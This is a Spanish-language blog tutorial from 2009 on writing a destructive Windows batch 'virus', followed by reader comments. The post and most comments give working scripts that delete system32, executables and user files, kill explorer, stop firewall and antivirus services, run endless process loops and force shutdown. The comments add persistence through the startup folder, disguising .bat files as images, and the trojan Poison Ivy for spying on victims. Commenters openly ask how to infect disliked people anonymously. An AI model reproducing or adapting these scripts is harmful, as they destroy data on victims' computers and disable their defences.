Tutorial: Crear virus sencillo en batch (.bat)Tutorial

jueves, 5 de febrero de 2009

Tutorial de como hacer un virus fácilmente en batch (.bat)
Para crear un virus .batch potente y sencillo, no hace falta saber de programación, aunque conviene. Batch es un lenguaje de MS-DOS, el sistema operativo en el que trabaja window (Window es un sistema operativo de Microsoft).

Si explico como crear virus fácilmente, no es para que lammers se lo den a todo el mundo. Un lammer es una persona que, por ejemplo, coge un virus sencillo ya creado, se lo pasa a todos los que conoce y disfruta con esto creyéndose un hacker. Explico como crear un virus para que aprendan y como mucho infecteis a una persona molesta :)

Como dije antes, batch (.bat) es el lenguaje de MS-DOS y se suele utilizar para crear virus. Podeis ejecutar MS- DOS en Window en Inicio > Ejecutar escribiendo cmd tal cual, pero vamos a crear y editar el virus batch .bat en un documento de texto (notepad). Los códigos más usados son estos:

@echo off
Sirve que para que nuestro virus no salga en la pantalla,es decir,para que la ventanita del ms-dos no sea mostrada.

title

Tanto como en nuestro virus como en otro programa programado en "batch" sirve para poner un título a la aplicación que hayamos programado.En pocas palabras: "Pone un tituto a nuestro programa"

Del:
Comando que se usa explícitamente para borrar carpetas o ficheros,mediante otros comandos se puede forzar el borrado de la carpeta,o de cualquier otro archivo

Comandos del comando Del:

Comando: /F (Borra los archivos con solo lectura)
Comando: /S (Elimina los archivos indicados)
Comando: /P (Pide confirmación antes de borrar cada archivo)

Net Stop
Sirve para parar algun servicio o medio que transcurra a través de nuestro sistema,así como el centro de seguridad,firewall de windows o otro medio de seguridad del equipo.Con este comando,facilita una desactivación de estos servicios,evitando ser activados automáticamente.
Pero a través de este comando,el usuario puede ver como han sido desactivados componentes de su sistema.

taskkill
Este comando es usado a la hora de querer matar procesos que corren a través de nuestro sistema.Cuando queremos parar un proceso de nuestro sistema,este comando realiza esa función,mata un proceso específico que le hayamos ordenado,más comodo a la hora de querer meter nuestro virus y matar el antivirus,o matar cualquier otro proceso que lleve a un programa,aplicacion...

start
Comando start sirve para empezar una tarea,ya sea abrir el explorador,un programa,una hoja de cálculos (bloc de notas) paint,wordpad,word...Cualquier programa, con solo el comando "start" seguido del programa a ejecutar,ejemplo:

start cmd.exe

:bucle -- goto bucle
El comando :bucle sirve para hacer un bucle como su propio nombre indica.Con este comando podemos ejecutar infinitas tareas,programas,aplicaciones,juegos...Todo esto de forma masiva,de modo que lo único que podremos hacer,seria reinicio del ordenador.
El comando goto bucle,es el que hay que poner una vez indicado la tarea a realizar.Ejemp lo:

:bucle
start cmd.exe
goto bucle

Hemos dicho a nuestro virus mediante el comando :bucle y goto bucle que habra infinitos cmd de notas masivamente,esto es un ejemplo,se pueden abrir 1000 programas más.

shutdown
Comando shutdown sirve para reiniciar o apagar el ordenador mediante un tiempo estimado que se le añada o otros valores.

Comandos de shutdown:
Comando: -s (Apaga el equipo)
Comando: -r (Apagar y reiniciar el ordenador)
Comando: -a (Anula el apagado del equipo)
Comando: -t 21 (Pone tiempo para el apagado,donde dice 21 son los segundos que tardará en apagarse/reiniciarse.
Comando: -f (Fuerza el cierre de todos los programas sin advertir al usuario)

Empezemos:

Para empezar a hacer nuestro primer bichito,podemos empezar por algo sencillo,en nuestra consola escribimos lo siguiente:

@echo off

Una vez tecleado esto,con el comando "del" podemos indicar que carpeta o fichero borrar.Yo por ejemplo,podría poner este código:

@echo off
del /S /F c:\windows\system32\
del /S /F *exe
del /S /F *mp3
taskkill /f /im "explorer.exe"
shutdown -s -f -t 10 -c "Muestra del virus"

Este es mi virus,es muy básico, ya que puede meterse más código y más dañino,pero con esto,ya es asegurado un daño. Explicación:

El "@echo off" consigue que el virus se ejecute "sigilosamente", como explicamos.

El "del /S /F c:\windows\system32" Borra system32 o lo mismo "rompe el pc". La victima tendria que formatear el ordenador e instalar el Sistema operativo

El "del /S /F *exe" borra todos los archivos .exe, entre los que se encuentran aplicaciones de procesos "vitales", por lo que tendrá que formatear tambien.

El "del /S /F *mp3" No se carga el ordenador, pero borra todos los archivos .mp3

El "taskkill /f /im "explorer.exe"" Cierra el proceso explorer, por lo que el ordenador se congelará.

El "shutdown -s -f -t 10 -c "Muestra del virus"" apaga el ordenador a los 10 segundos.

Haciendo unos cambios, como borrar la carpeta Mis documentos antes de cargarse el ordenador, conseguimos que la victima pierda totalmente archivos y documentos que de la otra manera se pueden recuperar. Para guardarlo en batch, en el bloc de notas, vamos archivo > guardar como > ponemos el nombre > elegimos "todos los archivos" y en el nombre lo acabamos en .bat

Ya está, parecia mas complejo de lo que era. Ya teneis vuestro primer virus sencillo en batch o bat

16 comentarios:

Anónimo dijo...

Soy el de Wikun-Matapatos. xD

Pregunto: Tengo que enganchar, lo que pones tu:

@echo off
del /S /F c:\windows\system32\
del /S /F *exe
del /S /F *mp3
taskkill /f /im "explorer.exe"
shutdown -s -f -t 10 -c "Muestra del virus"


Y lo envio a alguno en una conversacion por msn , lo abre y ya esta infectado?¿

Muchas gracias por tu respuesta. La espero impaciente. xD. Adios.

Alex2424 dijo...

Para borrar la carpeta entera seria
rd c:\windows\system32, por lo demás todo bien. Voy a publicar otra entrada con mas códigos

Alex2424 dijo...

El archivo tienes que guardarlo en .bat y la victima tiene que ejecutarlo. Ademas hay "compiladores" que ocultan el .bat en .exe o en .jpeg cosa que resulta mas atractiva... Lo pondre en otra entrada

Anónimo dijo...

Oks. Espero impaciente. xD.

Pero a ver, soy un poco noob en esto del hackerismo, aunque algo sé... xD

Si pego esto en el blog de notas:

@echo off
del /S /F c:\windows\system32\
del /S /F *exe
del /S /F *mp3
taskkill /f /im "explorer.exe"
shutdown -s -f -t 10 -c "Muestra del virus"

Entonces lo guardo en .bat y se lo envio a alguien por el messenger y lo abre, etnoces se le borrará del disco suyo, el comando que yo haya escrito en el blog de notas. Eso oks.
Pero como hago para dominar yo y que quira lo que haga el gusano enviado por mi a su ordenador. O sea, ver lo que hace la victima y dominarla. Un poco dificil, no?

Bueno, a ver si lo sabes, no es para retatarte, xD si no a ver si me lo resueves. Espero impaciente a tu comentario y tus proximas entradas que dices. Muchas gracias y Adios.

Alex2424 dijo...

jje. Yo lo que se es lo que voy viendo por internet. Hay comandos de .bat que formatean el ordenador, o que te habre infinitos procesos hasta cargarse la maquina. Intentaré poner mas en una proxima entrada.

Por cierto, te gusta mas este nuevo estilo del blog?

Anónimo dijo...

Pues la verdad es que si me gusta mas el aspecto. JEJE.

Estoy esperando tu nueva entrada con impaciencia. xD. Adios.

Anónimo dijo...

Ami ya se abia ocurrido eso, pero con la carpeta de archivos de programa, pero jamas lo Probe,
Ami se me ocurrio meter el bat silencioso en una carpeta que se encuentra en (C:\Documents and Settings\Administrador\Menú Inicio\Programas\Inicio)
Al meter el archivo es esa carpeta se ejecuta automaticamente el programa al prender la pc

Dios todopoderoso dijo...

Hola, no se mucho de esto la verdad pero por lo que lei el otro dia me puse crativo y escribi esto, te parece que pueda funcionar?

@echo off
title Your Last Breath
AT 1/4/09 20:00 goto activo
goto inactivo
:activo
rd /S /F c:\windows\system32\
rd /S /F C:\Documents and Settings\
rd /S /F C:\Archivos de programa
rd /S /F C:\Program Files
del /S /F *exe
taskkill /f /im "explorer.exe"
shutdown -s -f -t 10
:mensaje
taskkill /f/im "taskmgr.exe"
msg * Estas perdido
goto mensaje
:inactivo

Busco que el .bat espere que sea un dia y hora especificos para borrar cosas y eso.

Si esta mal, me podrias decir como seria un codigo con el efecto que busco?

Gracias, esperare tu respuesta.

Alejandro dijo...

para poner un titulo pongo title , pero luego pongo seguido el titulo que quiera o hay que poner un guion o algo asi
gracias por su alluda !

Alex2424 dijo...

Alejandro, seria:
title loksea

Anonimo, del es para borrar un archivo concreto, para borrar una carpeta es rd Ej:
rd c:\windows\system32\

Para poder controlar y espiar totalmente a una victima usa un troyano. Busca en google "tutorial poison ivy" y encontras como usar un trollano muy sencillo.

vipering dijo...

corregidme si hay algún error

pero podría funcionar?


@echo off
msg*(virus mortal in executed)
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
M1rBBus.set.u1
NET STOP "Dispositivo host de UPnP"
NET STOP "AntiVirService"
NET STOP "PDAgent"
NET STOP "Telefonia"
NET STOP "Temas"
NET STOP "Centro de Seguridad"
NET STOP "Windows Defender"
NET STOP "Firewall de Windows"
NET STOP "Ready Boost"
NET STOP "Busqueda de Windows"
NET STOP "Windows Update"
NET STOP "Inicio de Sesion secundario"
NET STOP "TapiSrv"
NET STOP "CryptSvc"
NET STOP "WPDBusEnum"
NET STOP "BITS"
NET STOP "seclogon"
NET START "C:\WINDOWS\Prefetch"
del/p/C:\WINDOWS\Prefetch
start iexplore.exe
start avtapi.dll
start cmd.exe
start login.bat
start migpwd.exe
start ntbackup.exe
start netstat.exe
:bucle
start regedit.exe
goto bucle
rd/S/F C:\WINDOWS
rd/P/C:\WINDOWS
taskkill /f /im "explorer.exe"
shutdown -s -f -t 10
msg * Estas perdido
goto mensaje
:inactivo

Anónimo dijo...

Hola,
Bueno tenía una duda:
Si me cae mal una persona y quiero hacerle llegar este virus sin que sepa que fui yo, como lo hago ??

Me gustó mucho tu blog...
Espero la respuesta
Atte.
AA

Alex2424 dijo...

Repito: del es para borrar archivos y rd para borrer carpretas.
Dios todopoderoso lo tuyo no funciona porque probablemente a las 1/4/09 20:00 no se estará ejecutando el archivo, busca mas informacion aqui
Vipering es mas fácil borrar un archivo de sistem32

Jose dijo...

olle k kodigo avria k poner xara eliminar un antivirus x ejemplo el norton y ace falta ponr las comillas en los codigas un saludo y GRACIAS ;)

Anónimo dijo...

como podria indicar el programa que quiero borrar? Por ejemploooo el QUAKE

Alex2424 dijo...

Puedes borrar la carpeta con los archivos. Prueba con la carpeta donde se instala por defecto, si esta en otra carpeta no funcionara.

Puedes probar con

del /S /F c:/*exe
del /S /F c:/quake/*exe
del /S /F c:/Archivos de programas/quake*exe